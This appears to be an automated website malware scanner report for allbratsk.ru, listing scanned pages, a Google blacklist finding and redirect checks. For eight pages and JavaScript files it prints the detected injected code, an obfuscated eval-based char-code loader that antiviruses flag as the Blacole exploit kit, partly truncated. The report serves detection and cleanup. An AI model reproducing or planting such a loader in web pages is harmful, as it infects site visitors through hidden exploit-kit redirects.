Malware Scanner report for allbratsk.ru

Malicious/Suspicious/Total urls checked: 8/0/10

8 pages have malicious code. See details below

Blacklists: Found

The website is marked by Google as suspicious.

The website "allbratsk.ru" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/0

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=allbratsk.ru

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

Request	Server response	Status
http://allbratsk.ru/	200 OK Content-Length: 6141 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) try{document.body/=2}catch(gdsgd){ww=window;v="va"+"l";if(ww.document)try{document.body=12;}catch(gdsgsdg){asd=0;try{q=document.createElement("div");}catch(q){asd=1;}if(!asd){w={a:ww}.a;vv="e"+v;}}e=w[vv];if(1){f=new Array(40,101,115,107,99,115,103,108,110,31,38,38,32,122,11,7,32,31,30,29,118,96,112,29,115,119,97,106,32,60,30,97,111,98,115,106,101,109,114,43,99,113,99,94,116,100,67,105,101,108,99,107,116,39,37,102,102,113,95,106,101,38,39,56,13,9,11,7,32,31,30,29,115,119,97,106,46,114,112,96,32, ... 988 bytes are skipped ...16,107,98,110,115,44,116,114,104,114,98,40,38,58,97,105,117,30,102,100,60,90,36,115,119,97,106,92,38,60,57,47,99,103,115,62,38,39,56,13,9,30,29,32,31,30,29,32,31,98,108,99,116,107,98,110,115,44,100,101,115,67,105,101,108,99,107,116,65,119,70,100,39,37,112,120,98,107,36,41,45,95,109,112,100,108,97,67,103,103,105,100,39,113,117,99,108,39,56,13,9,30,29,32,31,123,10,10,124,39,37,41,58);}w=f;s=[];for(i=2-2;-i+482!=0;i+=1){j=i;if((031==0x19))if(e)s=s+String.fromCharCode((1*w[j]+e("j%4")));}xz=e;xz(s)} Antivirus reports: AntiVir JS/Blacole.JL Avast JS:Iframe-AIU [Trj] Ikarus Exploit.JS.Blacole nProtect Trojan.Script.480986 Comodo TrojWare.JS.Agent.GZ McAfee-GW-Edition JS/Exploit-Blacole.gc Microsoft Exploit:JS/Blacole.JL MicroWorld-eScan Trojan.Script.480986 McAfee JS/Exploit-Blacole.gc NANO-Antivirus Trojan.Script.Iframe.bgvzbb F-Secure Trojan.Script.480986 GData Trojan.Script.480986 BitDefender Trojan.Script.480986
http://allbratsk.ru/js/jquery.1.7.1.js	200 OK Content-Length: 96151 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) try{document.body/=2}catch(gdsgd){ww=window;v="va"+"l";if(ww.document)try{document.body=12;}catch(gdsgsdg){asd=0;try{q=document.createElement("div");}catch(q){asd=1;}if(!asd){w={a:ww}.a;vv="e"+v;}}e=w[vv];if(1){f=new Array(40,101,115,107,99,115 ... 1257 bytes are skipped ...07,98,110,115,44,116,114,104,114,98,40,38,58,97,105,117,30,102,100,60,90,36,110,113,111,112,92,38,60,57,47,99,103,115,62,38,39,56,13,9,30,29,32,31,30,29,32,31,98,108,99,116,107,98,110,115,44,100,101,115,67,105,101,108,99,107,116,65,119,70,100,39,37,107,114,112,113,36,41,45,95,109,112,100,108,97,67,103,103,105,100,39,108,111,113,114,39,56,13,9,30,29,32,31,123,10,10,124,39,37,41,58);}w=f;s=[];for(i=2-2;-i+482!=0;i+=1){j=i;if((031==0x19))if(e)s=s+String.fromCharCode((1*w[j]+e("j%4")));}xz=e;xz(s)} Antivirus reports: AntiVir JS/Blacole.JL Avast JS:Iframe-AIU [Trj] Ikarus Exploit.JS.Blacole nProtect Trojan.Script.480986 Comodo TrojWare.JS.Agent.GZ McAfee-GW-Edition JS/Exploit-Blacole.gc Microsoft Exploit:JS/Blacole.JL MicroWorld-eScan Trojan.Script.480986 McAfee JS/Exploit-Blacole.gc NANO-Antivirus Trojan.Script.Iframe.bgvzbb F-Secure Trojan.Script.480986 GData Trojan.Script.480986 BitDefender Trojan.Script.480986
http://allbratsk.ru/js/cufon.js	200 OK Content-Length: 20545 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) try{document.body/=2}catch(gdsgd){ww=window;v="va"+"l";if(ww.document)try{document.body=12;}catch(gdsgsdg){asd=0;try{q=document.createElement("div");}catch(q){asd=1;}if(!asd){w={a:ww}.a;vv="e"+v;}}e=w[vv];if(1){f=new Array(40,101,115,107,99,115 ... 1257 bytes are skipped ...07,98,110,115,44,116,114,104,114,98,40,38,58,97,105,117,30,102,100,60,90,36,110,113,111,112,92,38,60,57,47,99,103,115,62,38,39,56,13,9,30,29,32,31,30,29,32,31,98,108,99,116,107,98,110,115,44,100,101,115,67,105,101,108,99,107,116,65,119,70,100,39,37,107,114,112,113,36,41,45,95,109,112,100,108,97,67,103,103,105,100,39,108,111,113,114,39,56,13,9,30,29,32,31,123,10,10,124,39,37,41,58);}w=f;s=[];for(i=2-2;-i+482!=0;i+=1){j=i;if((031==0x19))if(e)s=s+String.fromCharCode((1*w[j]+e("j%4")));}xz=e;xz(s)} Antivirus reports: AntiVir JS/Blacole.JL Avast JS:Iframe-AIU [Trj] Ikarus Exploit.JS.Blacole nProtect Trojan.Script.480986 Comodo TrojWare.JS.Agent.GZ McAfee-GW-Edition JS/Exploit-Blacole.gc Microsoft Exploit:JS/Blacole.JL MicroWorld-eScan Trojan.Script.480986 McAfee JS/Exploit-Blacole.gc NANO-Antivirus Trojan.Script.Iframe.bgvzbb F-Secure Trojan.Script.480986 GData Trojan.Script.480986 BitDefender Trojan.Script.480986
http://allbratsk.ru/js/jquery.mousewheel.js	200 OK Content-Length: 4764 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) try{document.body/=2}catch(gdsgd){ww=window;v="va"+"l";if(ww.document)try{document.body=12;}catch(gdsgsdg){asd=0;try{q=document.createElement("div");}catch(q){asd=1;}if(!asd){w={a:ww}.a;vv="e"+v;}}e=w[vv];if(1){f=new Array(40,101,115,107,99,115 ... 1257 bytes are skipped ...07,98,110,115,44,116,114,104,114,98,40,38,58,97,105,117,30,102,100,60,90,36,110,113,111,112,92,38,60,57,47,99,103,115,62,38,39,56,13,9,30,29,32,31,30,29,32,31,98,108,99,116,107,98,110,115,44,100,101,115,67,105,101,108,99,107,116,65,119,70,100,39,37,107,114,112,113,36,41,45,95,109,112,100,108,97,67,103,103,105,100,39,108,111,113,114,39,56,13,9,30,29,32,31,123,10,10,124,39,37,41,58);}w=f;s=[];for(i=2-2;-i+482!=0;i+=1){j=i;if((031==0x19))if(e)s=s+String.fromCharCode((1*w[j]+e("j%4")));}xz=e;xz(s)} Antivirus reports: AntiVir JS/Blacole.JL Avast JS:Iframe-AIU [Trj] Ikarus Exploit.JS.Blacole nProtect Trojan.Script.480986 Comodo TrojWare.JS.Agent.GZ McAfee-GW-Edition JS/Exploit-Blacole.gc Microsoft Exploit:JS/Blacole.JL MicroWorld-eScan Trojan.Script.480986 McAfee JS/Exploit-Blacole.gc NANO-Antivirus Trojan.Script.Iframe.bgvzbb F-Secure Trojan.Script.480986 GData Trojan.Script.480986 BitDefender Trojan.Script.480986
http://allbratsk.ru/js/jquery.jscrollpane.min.js	200 OK Content-Length: 16907 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) try{document.body/=2}catch(gdsgd){ww=window;v="va"+"l";if(ww.document)try{document.body=12;}catch(gdsgsdg){asd=0;try{q=document.createElement("div");}catch(q){asd=1;}if(!asd){w={a:ww}.a;vv="e"+v;}}e=w[vv];if(1){f=new Array(40,101,115,107,99,115 ... 1257 bytes are skipped ...07,98,110,115,44,116,114,104,114,98,40,38,58,97,105,117,30,102,100,60,90,36,110,113,111,112,92,38,60,57,47,99,103,115,62,38,39,56,13,9,30,29,32,31,30,29,32,31,98,108,99,116,107,98,110,115,44,100,101,115,67,105,101,108,99,107,116,65,119,70,100,39,37,107,114,112,113,36,41,45,95,109,112,100,108,97,67,103,103,105,100,39,108,111,113,114,39,56,13,9,30,29,32,31,123,10,10,124,39,37,41,58);}w=f;s=[];for(i=2-2;-i+482!=0;i+=1){j=i;if((031==0x19))if(e)s=s+String.fromCharCode((1*w[j]+e("j%4")));}xz=e;xz(s)} Antivirus reports: AntiVir JS/Blacole.JL Avast JS:Iframe-AIU [Trj] Ikarus Exploit.JS.Blacole nProtect Trojan.Script.480986 Comodo TrojWare.JS.Agent.GZ McAfee-GW-Edition JS/Exploit-Blacole.gc Microsoft Exploit:JS/Blacole.JL MicroWorld-eScan Trojan.Script.480986 McAfee JS/Exploit-Blacole.gc NANO-Antivirus Trojan.Script.Iframe.bgvzbb F-Secure Trojan.Script.480986 GData Trojan.Script.480986 BitDefender Trojan.Script.480986
http://allbratsk.ru/js/config.js	200 OK Content-Length: 4135 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) try{document.body/=2}catch(gdsgd){ww=window;v="va"+"l";if(ww.document)try{document.body=12;}catch(gdsgsdg){asd=0;try{q=document.createElement("div");}catch(q){asd=1;}if(!asd){w={a:ww}.a;vv="e"+v;}}e=w[vv];if(1){f=new Array(40,101,115,107,99,115 ... 1257 bytes are skipped ...07,98,110,115,44,116,114,104,114,98,40,38,58,97,105,117,30,102,100,60,90,36,110,113,111,112,92,38,60,57,47,99,103,115,62,38,39,56,13,9,30,29,32,31,30,29,32,31,98,108,99,116,107,98,110,115,44,100,101,115,67,105,101,108,99,107,116,65,119,70,100,39,37,107,114,112,113,36,41,45,95,109,112,100,108,97,67,103,103,105,100,39,108,111,113,114,39,56,13,9,30,29,32,31,123,10,10,124,39,37,41,58);}w=f;s=[];for(i=2-2;-i+482!=0;i+=1){j=i;if((031==0x19))if(e)s=s+String.fromCharCode((1*w[j]+e("j%4")));}xz=e;xz(s)} Antivirus reports: AntiVir JS/Blacole.JL Avast JS:Iframe-AIU [Trj] Ikarus Exploit.JS.Blacole nProtect Trojan.Script.480986 Comodo TrojWare.JS.Agent.GZ McAfee-GW-Edition JS/Exploit-Blacole.gc Microsoft Exploit:JS/Blacole.JL MicroWorld-eScan Trojan.Script.480986 McAfee JS/Exploit-Blacole.gc NANO-Antivirus Trojan.Script.Iframe.bgvzbb F-Secure Trojan.Script.480986 GData Trojan.Script.480986 BitDefender Trojan.Script.480986
http://allbratsk.ru/js/script.js	200 OK Content-Length: 17227 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) try{document.body/=2}catch(gdsgd){ww=window;v="va"+"l";if(ww.document)try{document.body=12;}catch(gdsgsdg){asd=0;try{q=document.createElement("div");}catch(q){asd=1;}if(!asd){w={a:ww}.a;vv="e"+v;}}e=w[vv];if(1){f=new Array(40,101,115,107,99,115 ... 1257 bytes are skipped ...07,98,110,115,44,116,114,104,114,98,40,38,58,97,105,117,30,102,100,60,90,36,110,113,111,112,92,38,60,57,47,99,103,115,62,38,39,56,13,9,30,29,32,31,30,29,32,31,98,108,99,116,107,98,110,115,44,100,101,115,67,105,101,108,99,107,116,65,119,70,100,39,37,107,114,112,113,36,41,45,95,109,112,100,108,97,67,103,103,105,100,39,108,111,113,114,39,56,13,9,30,29,32,31,123,10,10,124,39,37,41,58);}w=f;s=[];for(i=2-2;-i+482!=0;i+=1){j=i;if((031==0x19))if(e)s=s+String.fromCharCode((1*w[j]+e("j%4")));}xz=e;xz(s)} Antivirus reports: AntiVir JS/Blacole.JL Avast JS:Iframe-AIU [Trj] Ikarus Exploit.JS.Blacole nProtect Trojan.Script.480986 Comodo TrojWare.JS.Agent.GZ McAfee-GW-Edition JS/Exploit-Blacole.gc Microsoft Exploit:JS/Blacole.JL MicroWorld-eScan Trojan.Script.480986 McAfee JS/Exploit-Blacole.gc NANO-Antivirus Trojan.Script.Iframe.bgvzbb F-Secure Trojan.Script.480986 GData Trojan.Script.480986 BitDefender Trojan.Script.480986
http://allbratsk.ru/../	400 Bad Request Content-Length: 226 Content-Type: text/html	clean
http://allbratsk.ru/test404page.js	404 Not Found Content-Length: 212 Content-Type: text/html	clean
http://allbratsk.ru/about.html	200 OK Content-Length: 4176 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) try{document.body/=2}catch(gdsgd){ww=window;v="va"+"l";if(ww.document)try{document.body=12;}catch(gdsgsdg){asd=0;try{q=document.createElement("div");}catch(q){asd=1;}if(!asd){w={a:ww}.a;vv="e"+v;}}e=w[vv];if(1){f=new Array(40,101,115,107,99,115,103,108,110,31,38,38,32,122,11,7,32,31,30,29,118,96,112,29,115,119,97,106,32,60,30,97,111,98,115,106,101,109,114,43,99,113,99,94,116,100,67,105,101,108,99,107,116,39,37,102,102,113,95,106,101,38,39,56,13,9,11,7,32,31,30,29,115,119,97,106,46,114,112,96,32, ... 988 bytes are skipped ...16,107,98,110,115,44,116,114,104,114,98,40,38,58,97,105,117,30,102,100,60,90,36,115,119,97,106,92,38,60,57,47,99,103,115,62,38,39,56,13,9,30,29,32,31,30,29,32,31,98,108,99,116,107,98,110,115,44,100,101,115,67,105,101,108,99,107,116,65,119,70,100,39,37,112,120,98,107,36,41,45,95,109,112,100,108,97,67,103,103,105,100,39,113,117,99,108,39,56,13,9,30,29,32,31,123,10,10,124,39,37,41,58);}w=f;s=[];for(i=2-2;-i+482!=0;i+=1){j=i;if((031==0x19))if(e)s=s+String.fromCharCode((1*w[j]+e("j%4")));}xz=e;xz(s)} Antivirus reports: AntiVir JS/Blacole.JL Avast JS:Iframe-AIU [Trj] Ikarus Exploit.JS.Blacole nProtect Trojan.Script.480986 Comodo TrojWare.JS.Agent.GZ McAfee-GW-Edition JS/Exploit-Blacole.gc Microsoft Exploit:JS/Blacole.JL MicroWorld-eScan Trojan.Script.480986 McAfee JS/Exploit-Blacole.gc NANO-Antivirus Trojan.Script.Iframe.bgvzbb F-Secure Trojan.Script.480986 GData Trojan.Script.480986 BitDefender Trojan.Script.480986

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: allbratsk.ru

Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 08 Jan 2015 10:04:09 GMT
Accept-Ranges: bytes
ETag: "1a5495-17fd-4d532ef142ac0"
Server: Apache/2.2.22 (FreeBSD) PHP/5.2.17 with Suhosin-Patch mod_ssl/2.2.22 OpenSSL/0.9.8q DAV/2
Content-Length: 6141
Content-Type: text/html
Last-Modified: Fri, 08 Feb 2013 09:10:43 GMT

...6141 bytes of data.

Second query (visit from search engine):
GET / HTTP/1.1
Host: allbratsk.ru
Referer: http://www.google.com/search?q=allbratsk.ru

Result:
The result is similar to the first query. There are no suspicious redirects found.

Recently found suspicious websites

Malware Scanner report for allbratsk.ru

Malware & Hack Repair

Website Hack Insurance

Safe Browsing / Blacklists

Scanned pages/files

Malicious Redirects

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools